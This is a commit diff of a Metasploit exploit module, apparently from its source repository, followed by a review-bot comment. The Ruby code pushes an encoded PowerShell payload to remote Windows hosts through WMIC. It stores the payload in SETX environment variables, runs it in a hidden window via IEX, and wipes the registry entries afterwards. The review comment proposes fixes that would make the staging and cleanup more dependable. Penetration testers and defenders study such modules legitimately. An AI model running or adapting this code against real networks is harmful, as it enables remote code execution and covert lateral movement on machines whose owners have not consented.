If extapi dont stage payload
parent
186d8bd359
commit
c14ba11e79
|
@ -27,9 +27,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
the session's current authentication token instead of having to know
|
||||
a password or hash.
|
||||
|
||||
We do not get feedback from the WMIC command so there are no
|
||||
indicators of success or failure. The remote host must be configured
|
||||
to allow remote Windows Management Instrumentation.
|
||||
The remote host must be configured to allow remote Windows Management
|
||||
Instrumentation.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
|
@ -76,42 +75,50 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def run_host(server)
|
||||
if load_extapi
|
||||
psh_options = { :remove_comspec => true,
|
||||
:encode_final_payload => true }
|
||||
else
|
||||
psh_options = { :remove_comspec => true,
|
||||
:encode_inner_payload => true,
|
||||
:use_single_quotes => true }
|
||||
end
|
||||
# Get the PSH Payload and split it into bitesize chunks
|
||||
# 1024 appears to be the max value allowed in env vars
|
||||
psh = cmd_psh_payload(payload.encoded,
|
||||
payload_instance.arch.first,
|
||||
{
|
||||
:remove_comspec => true,
|
||||
:encode_inner_payload => true,
|
||||
:use_single_quotes => true
|
||||
})
|
||||
chunks = split_code(psh, 1000)
|
||||
psh_options)
|
||||
|
||||
begin
|
||||
print_status("[#{server}] Storing payload in environment variables")
|
||||
env_name = rand_text_alpha(rand(3)+3)
|
||||
env_vars = []
|
||||
0.upto(chunks.length-1) do |i|
|
||||
env_vars << "#{env_name}#{i}"
|
||||
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
|
||||
result = wmic_command(c, server)
|
||||
if load_extapi
|
||||
exec_cmd = psh
|
||||
else
|
||||
print_status("[#{server}] Storing payload in environment variables")
|
||||
chunks = split_code(psh, 1000)
|
||||
env_name = rand_text_alpha(rand(3)+3)
|
||||
env_vars = []
|
||||
0.upto(chunks.length-1) do |i|
|
||||
env_vars << "#{env_name}#{i}"
|
||||
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
|
||||
result = wmic_command(c, server)
|
||||
|
||||
unless result
|
||||
print_error("[#{server}] WMIC command error - skipping host")
|
||||
return false
|
||||
unless result
|
||||
print_error("[#{server}] WMIC command error - skipping host")
|
||||
return false
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
x = rand_text_alpha(rand(3)+3)
|
||||
exec_cmd = generate_psh_command_line({
|
||||
:noprofile => true,
|
||||
:windowstyle => 'hidden',
|
||||
:command => "$#{x}=''"
|
||||
})
|
||||
env_vars.each do |env|
|
||||
exec_cmd << "+$env:#{env}"
|
||||
x = rand_text_alpha(rand(3)+3)
|
||||
exec_cmd = generate_psh_command_line({
|
||||
:noprofile => true,
|
||||
:windowstyle => 'hidden',
|
||||
:command => "$#{x}=''"
|
||||
})
|
||||
env_vars.each do |env|
|
||||
exec_cmd << "+$env:#{env}"
|
||||
end
|
||||
exec_cmd << ";IEX $#{x};"
|
||||
end
|
||||
exec_cmd << ";IEX $#{x};"
|
||||
|
||||
print_status("[#{server}] Executing payload")
|
||||
result = wmic_command(exec_cmd, server)
|
||||
|
@ -126,10 +133,12 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_error("[#{server}] failed...)")
|
||||
end
|
||||
|
||||
print_status("[#{server}] Cleaning up environment variables")
|
||||
env_vars.each do |env|
|
||||
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
|
||||
wmic_command(cleanup_cmd, server)
|
||||
unless load_extapi
|
||||
print_status("[#{server}] Cleaning up environment variables")
|
||||
env_vars.each do |env|
|
||||
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
|
||||
wmic_command(cleanup_cmd, server)
|
||||
end
|
||||
end
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
print_error("[#{server}] Error moving on... #{e}")
|
||||
|
|
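Review bot: `load_extapi` is evaluated three separate times in run_host — once to choose `psh_options`, once to pick the staging branch, and once more as the cleanup guard `unless load_extapi` — and `env_vars` is only ever assigned in the non-extapi branch, so if any of those calls returns a different value than the first the cleanup loop either runs against an undefined `env_vars` or is skipped while variables remain set on the host. Evaluate it once at the top of the method, `use_extapi = load_extapi`, and test that local in the other two places so the staging and cleanup paths cannot diverge. The `return false` on a failed SETX inside the `0.upto` block also leaves any chunks already stored on the remote host without reaching the cleanup loop; that is pre-existing, but moving the REG delete loop into an `ensure` would cover both paths. run_host and its `begin`/`rescue` continue past the end of the hunk.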